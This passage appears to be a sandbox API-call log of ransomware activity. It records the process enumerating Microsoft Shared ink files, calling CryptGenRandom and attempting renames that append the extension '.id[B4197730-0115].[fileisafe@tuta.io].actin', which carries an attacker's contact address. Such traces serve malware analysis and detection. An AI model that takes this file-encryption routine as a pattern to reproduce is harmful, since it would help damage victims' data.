files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.587] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=181964) returned 1 [0146.587] CloseHandle (hObject=0x2e0) returned 1 [0146.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0146.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.587] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.587] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.587] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.588] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=5120) returned 1 [0146.588] CloseHandle (hObject=0x2e0) returned 1 [0146.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui")) returned 0x20 [0146.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.588] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.588] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.588] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.588] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=2560) returned 1 [0146.588] CloseHandle (hObject=0x2e0) returned 1 [0146.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui")) returned 0x20 [0146.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.589] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.589] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.589] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.589] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=25088) returned 1 [0146.589] CloseHandle (hObject=0x2e0) returned 1 [0146.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui")) returned 0x20 [0146.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.590] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.590] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.590] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.590] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=9728) returned 1 [0146.590] CloseHandle (hObject=0x2e0) returned 1 [0146.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui")) returned 0x20 [0146.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.590] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.590] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.590] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.591] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3584) returned 1 [0146.591] CloseHandle (hObject=0x2e0) returned 1 [0146.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui")) returned 0x20 [0146.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.591] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.591] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.591] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.591] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0146.591] CloseHandle (hObject=0x2e0) returned 1 [0146.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui")) returned 0x20 [0146.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.591] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.592] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.592] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.592] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0146.592] CloseHandle (hObject=0x2e0) returned 1 [0146.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui")) returned 0x20 [0146.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.592] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.592] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.592] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.593] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10752) returned 1 [0146.593] CloseHandle (hObject=0x2e0) returned 1 [0146.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui")) returned 0x20 [0146.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.593] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0146.596] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0146.596] CloseHandle (hObject=0x2e0) returned 1 [0146.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui")) returned 0x20 [0146.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.596] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.596] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.596] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.752] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1600388) returned 1 [0146.752] CloseHandle (hObject=0x304) returned 1 [0146.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0146.752] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0146.752] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0 [0146.752] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.753] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1434) returned 1 [0146.753] CloseHandle (hObject=0x304) returned 1 [0146.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0146.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.754] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.754] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=212) returned 1 [0146.754] CloseHandle (hObject=0x304) returned 1 [0146.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml")) returned 0x20 [0146.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.755] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.755] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=903) returned 1 [0146.755] CloseHandle (hObject=0x304) returned 1 [0146.755] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml")) returned 0x20 [0146.756] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.756] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.756] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.756] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=215) returned 1 [0146.757] CloseHandle (hObject=0x304) returned 1 [0146.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml")) returned 0x20 [0146.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.757] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.758] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=384) returned 1 [0146.758] CloseHandle (hObject=0x304) returned 1 [0146.760] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0x20 [0146.760] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.760] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.760] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=903) returned 1 [0146.760] CloseHandle (hObject=0x304) returned 1 [0146.760] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft 